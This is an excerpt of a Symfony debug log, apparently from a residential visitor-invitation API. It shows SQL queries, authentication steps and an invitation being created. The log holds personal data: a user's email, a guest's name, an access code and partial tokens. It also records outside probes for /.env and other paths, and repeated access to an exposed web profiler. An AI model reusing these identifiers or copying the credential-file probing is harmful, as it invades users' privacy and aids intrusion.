  3007. [2025-12-18 00:19:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  3008. [2025-12-18 00:19:11] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3009. [2025-12-18 00:19:11] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3010. [2025-12-18 00:19:11] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3011. [2025-12-18 00:19:11] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  3012. [2025-12-18 00:20:00] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  3013. [2025-12-18 00:20:00] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  3014. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
  3015. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  3016. [2025-12-18 00:20:00] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  3017. [2025-12-18 00:20:00] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  3018. [2025-12-18 00:20:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  3019. [2025-12-18 00:20:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3020. [2025-12-18 00:20:00] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3021. [2025-12-18 00:20:00] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3022. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
  3023. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  3024. [2025-12-18 00:20:00] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3025. [2025-12-18 00:20:00] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3026. [2025-12-18 00:20:00] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3027. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  3028. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
  3029. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["586cd940-fe5c-40f9-b203-99 [...]"] []
  3030. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  3031. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [375,251,1] []
  3032. [2025-12-18 00:20:00] doctrine.DEBUG: "START TRANSACTION" [] []
  3033. [2025-12-18 00:20:00] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"f6bf3351-2f5f-440b-87ea-2b [...]","2":1,"3":"2025-12-18 00:20:00","4":"2025-12-18 00:20:00","5":"Gilberto","6":"Cespedes","7":"651499","8":"/invitation/688c833d65a452 [...]","9":"2","10":"1","11":"2025-12-18 14:00:00","12":null,"13":null,"14":null,"15":251,"16":375} []
  3034. [2025-12-18 00:20:00] doctrine.DEBUG: "COMMIT" [] []
  3035. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  3036. [2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [251] []
  3037. [2025-12-18 00:20:00] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  3038. [2025-12-18 00:20:01] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a725d03d-0217-4179-9082-5a05b0a9293e/invitation/20/0?order=desc","method":"GET"} []
  3039. [2025-12-18 00:20:01] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  3040. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
  3041. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  3042. [2025-12-18 00:20:01] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  3043. [2025-12-18 00:20:01] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  3044. [2025-12-18 00:20:01] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  3045. [2025-12-18 00:20:01] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3046. [2025-12-18 00:20:01] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3047. [2025-12-18 00:20:01] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3048. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
  3049. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  3050. [2025-12-18 00:20:01] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3051. [2025-12-18 00:20:01] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3052. [2025-12-18 00:20:01] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3053. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  3054. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
  3055. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  3056. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  3057. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [251,1] []
  3058. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [251,1] []
  3059. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  3060. [2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [417] []
  3061. [2025-12-18 00:20:01] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  3062. [2025-12-18 00:24:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3063. [2025-12-18 00:24:06] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  3064. [2025-12-18 00:25:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=security","method":"GET"} []
  3065. [2025-12-18 00:25:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  3066. [2025-12-18 00:27:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /geoserver/web/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /geoserver/web/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3067. [2025-12-18 00:28:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3068. [2025-12-18 00:34:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=security","method":"GET"} []
  3069. [2025-12-18 00:34:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  3070. [2025-12-18 00:39:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"243cd0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/243cd0?panel=config","method":"GET"} []
  3071. [2025-12-18 00:39:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3072. [2025-12-18 00:43:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?panel=db","method":"GET"} []
  3073. [2025-12-18 00:43:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  3074. [2025-12-18 00:50:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ac77e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ac77e0?panel=dump","method":"GET"} []
  3075. [2025-12-18 00:50:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  3076. [2025-12-18 00:59:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3077. [2025-12-18 01:14:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c7bb2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c7bb2b?panel=logger","method":"GET"} []
  3078. [2025-12-18 01:14:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  3079. [2025-12-18 01:19:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
  3080. [2025-12-18 01:19:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  3081. [2025-12-18 01:27:08] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"52b0f2","_route":"_profiler_exception"},"request_uri":"https://www.unda.co/_profiler/52b0f2/exception","method":"GET"} []
  3082. [2025-12-18 01:27:09] php.CRITICAL: Call to a member function getCollector() on null {"exception":"[object] (Symfony\\Component\\Debug\\Exception\\FatalThrowableError(code: 0): Call to a member function getCollector() on null at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php:61)"} []
  3083. [2025-12-18 01:27:09] request.CRITICAL: Uncaught PHP Exception Symfony\Component\Debug\Exception\FatalThrowableError: "Call to a member function getCollector() on null" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php line 61 {"exception":"[object] (Symfony\\Component\\Debug\\Exception\\FatalThrowableError(code: 0): Call to a member function getCollector() on null at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php:61)"} []
  3084. [2025-12-18 01:31:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c2eb9b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c2eb9b?panel=time","method":"GET"} []
  3085. [2025-12-18 01:31:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3086. [2025-12-18 01:38:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3087. [2025-12-18 01:39:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=logger","method":"GET"} []
  3088. [2025-12-18 01:39:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  3089. [2025-12-18 01:44:03] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  3090. [2025-12-18 01:46:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=cache","method":"GET"} []
  3091. [2025-12-18 01:46:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3092. [2025-12-18 01:49:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320","method":"GET"} []
  3093. [2025-12-18 01:49:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  3094. [2025-12-18 01:51:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3095. [2025-12-18 01:51:05] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  3096. [2025-12-18 02:07:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3097. [2025-12-18 02:11:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ed1483","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ed1483?group=1&panel=db","method":"GET"} []
  3098. [2025-12-18 02:11:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  3099. [2025-12-18 02:15:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
  3100. [2025-12-18 02:15:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  3101. [2025-12-18 02:18:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=dump","method":"GET"} []
  3102. [2025-12-18 02:18:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
